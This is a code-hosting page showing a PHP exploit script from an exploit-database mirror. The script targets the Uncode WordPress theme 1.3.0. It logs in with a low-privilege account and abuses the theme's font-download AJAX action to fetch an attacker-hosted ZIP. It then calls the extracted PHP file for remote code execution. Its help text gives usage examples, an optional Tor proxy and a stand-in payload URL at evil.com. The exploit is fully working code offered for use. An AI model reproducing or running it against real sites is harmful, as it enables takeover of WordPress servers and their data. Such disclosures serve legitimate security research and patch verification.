PageRenderTime 53ms CodeModel.GetById 28ms RepoModel.GetById 1ms app.codeStats 0ms

/exploits/php/webapps/39895.php

https://bitbucket.org/DinoRex99/exploit-database
PHP | 152 lines | 108 code | 30 blank | 14 comment | 14 complexity | 2984dfea9d986e9f155179b5873dafaa MD5 | raw file
Possible License(s): GPL-2.0 
    

  1. <?php

    2. 

  2. /**

    3. 

  3.  * Exploit Title: Uncode WP Theme RCE Expoit

    4. 

  4.  * Google Dork:

    5. 

  5.  * Exploit Author: wp0Day.com <contact@wp0day.com>

    6. 

  6.  * Vendor Homepage:

    7. 

  7.  * Software Link: http://themeforest.net/item/uncode-creative-multiuse-wordpress-theme/13373220

    8. 

  8.  * Version: 1.3.0 possible 1.3.1

    9. 

  9.  * Tested on: Debian 8, PHP 5.6.17-3

    10. 

  10.  * Type: RCE, Arbirary file UPLOAD, (Low Authenticated )

    11. 

  11.  * Time line: Found [24-APR-2016], Vendor notified [24-APR-2016], Vendor fixed: [27-APR-2016], [RD:1464134400]

    12. 

  12.  */

    13. 

  13. 

    14. 

  14. 

    15. 

  15. require_once('curl.php');

    16. 

  16. //OR

    17. 

  17. //include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php');

    18. 

  18. $curl = new CurlWrapper();

    19. 

  19. 

    20. 

  20. 

    21. 

  21. $options = getopt("t:u:p:f:",array('tor:'));

    22. 

  22. print_r($options);

    23. 

  23. $options = validateInput($options);

    24. 

  24. 

    25. 

  25. if (!$options){

    26. 

  26.     showHelp();

    27. 

  27. }

    28. 

  28. 

    29. 

  29. if ($options['tor'] === true)

    30. 

  30. {

    31. 

  31.     echo " ### USING TOR ###\n";

    32. 

  32.     echo "Setting TOR Proxy...\n";

    33. 

  33.     $curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/");

    34. 

  34.     $curl->addOption(CURLOPT_PROXYTYPE,7);

    35. 

  35.     echo "Checking IPv4 Address\n";

    36. 

  36.     $curl->get('https://dynamicdns.park-your-domain.com/getip');

    37. 

  37.     echo "Got IP : ".$curl->getResponse()."\n";

    38. 

  38.     echo "Are you sure you want to do this?\nType 'wololo' to continue: ";

    39. 

  39.     $answer = fgets(fopen ("php://stdin","r"));

    40. 

  40.     if(trim($answer) != 'wololo'){

    41. 

  41.         die("Aborting!\n");

    42. 

  42.     }

    43. 

  43.     echo "OK...\n";

    44. 

  44. }

    45. 

  45. 

    46. 

  46. 

    47. 

  47. function logIn(){

    48. 

  48.     global $curl, $options;

    49. 

  49.     file_put_contents('cookies.txt',"\n");

    50. 

  50.     $curl->setCookieFile('cookies.txt');

    51. 

  51.     $curl->get($options['t']);

    52. 

  52.     $data = array('log'=>$options['u'], 'pwd'=>$options['p'], 'redirect_to'=>$options['t'], 'wp-submit'=>'Log In');

    53. 

  53.     $curl->post($options['t'].'/wp-login.php', $data);

    54. 

  54.     $status =  $curl->getTransferInfo('http_code');

    55. 

  55.     if ($status !== 302){

    56. 

  56.         echo "Login probably failed, aborting...\n";

    57. 

  57.         echo "Login response saved to login.html.\n";

    58. 

  58.         die();

    59. 

  59.     }

    60. 

  60.     file_put_contents('login.html',$curl->getResponse());

    61. 

  61. 

    62. 

  62. 

    63. 

  63. }

    64. 

  64. 

    65. 

  65. function exploit(){

    66. 

  66.     global $curl, $options;

    67. 

  67.     echo "Generateing payload.\n";

    68. 

  68.     $data = array('action'=>'uncodefont_download_font', 'font_url'=>$options['f']);

    69. 

  69.     echo "Sending payload\n";

    70. 

  70.     $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);

    71. 

  71.     $resp = $curl->getResponse();

    72. 

  72.     echo "Eco response: ".$resp."\n";

    73. 

  73.     $resp = json_decode($resp,true);

    74. 

  74.     if ($resp['success'] === 'Font downloaded and extracted successfully.'){

    75. 

  75.         echo "Response ok, calling RCE\n";

    76. 

  76.         $file_path = parse_url($options['f']);

    77. 

  77.         $remote_file_info = pathinfo($file_path['path']);

    78. 

  78.         $zip_file_name = $remote_file_info['basename'];

    79. 

  79.         $zip_file_name_php  = str_replace('.zip', '.php', $zip_file_name);

    80. 

  80.         $url = $options['t'].'wp-content/uploads/uncode-fonts/'.$zip_file_name.'/'.$zip_file_name_php;

    81. 

  81.         echo 'Url: '. $url."\n";

    82. 

  82.         //POC Test mode

    83. 

  83.         if ($file_path['host'] == 'wp0day.com'){

    84. 

  84.             echo "Exploit test mode on\n";

    85. 

  85.             $rnd = rand();

    86. 

  86.             echo "Rand $rnd, MD5: ".md5($rnd)."\n";

    87. 

  87.             $url = $url . '?poc='.$rnd;

    88. 

  88.         }

    89. 

  89.         $curl->get($url);

    90. 

  90.         echo "RCE Response:";

    91. 

  91.         echo $curl->getResponse()."\n\n";

    92. 

  92.     }

    93. 

  93. }

    94. 

  94. 

    95. 

  95. 

    96. 

  96. logIn();

    97. 

  97. exploit();

    98. 

  98. 

    99. 

  99. 

    100. 

  100. 

    101. 

  101. function validateInput($options){

    102. 

  102. 

    103. 

  103.     if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){

    104. 

  104.         return false;

    105. 

  105.     }

    106. 

  106.     if ( !isset($options['u']) ){

    107. 

  107.         return false;

    108. 

  108.     }

    109. 

  109.     if ( !isset($options['p']) ){

    110. 

  110.         return false;

    111. 

  111.     }

    112. 

  112.     if ( !isset($options['f']) ){

    113. 

  113.         return false;

    114. 

  114.     }

    115. 

  115.     if (!preg_match('~/$~',$options['t'])){

    116. 

  116.         $options['t'] = $options['t'].'/';

    117. 

  117.     }

    118. 

  118. 

    119. 

  119.     $options['tor'] = isset($options['tor']);

    120. 

  120. 

    121. 

  121.     return $options;

    122. 

  122. }

    123. 

  123. 

    124. 

  124. 

    125. 

  125. function showHelp(){

    126. 

  126.     global $argv;

    127. 

  127.     $help = <<<EOD

    128. 

  128. 

    129. 

  129.     Uncode WP Theme RCE Expoit

    130. 

  130. 

    131. 

  131. Usage: php $argv[0] -t [TARGET URL] --tor [USE TOR?] -u [USERNAME] -p [PASSWORD] -f [URL]

    132. 

  132. 

    133. 

  133.        *** You need to have a valid login (customer or subscriber will do) in order to use this "exploit" **

    134. 

  134. 

    135. 

  135.        [TARGET_URL] http://localhost/wordpress/

    136. 

  136.        [URL] It must be ZIP file. It gets unzipped into /wp-content/uploads/uncode-fonts/[some.zip]/files folder

    137. 

  137.        Example: rce.php -> zip -> rce.zip -> http://evil.com/rce.zip -> /wp-content/uploads/uncode-fonts/rce.zip/rce.php

    138. 

  138. 

    139. 

  139. 

    140. 

  140. 

    141. 

  141. Examples:

    142. 

  142.        php $argv[0] -t http://localhost/wordpress --tor=yes -u customer1 -p password -f http://wp0day.com/res/php/poc.zip

    143. 

  143. 

    144. 

  144.     Misc:

    145. 

  145.            CURL Wrapper by Leonid Svyatov <leonid@svyatov.ru>

    146. 

  146.            @link http://github.com/svyatov/CurlWrapper

    147. 

  147.            @license http://www.opensource.org/licenses/mit-license.html MIT License

    148. 

  148. 

    149. 

  149. EOD;

    150. 

  150.     echo $help."\n\n";

    151. 

  151.     die();

    152. 

  152. }
    153.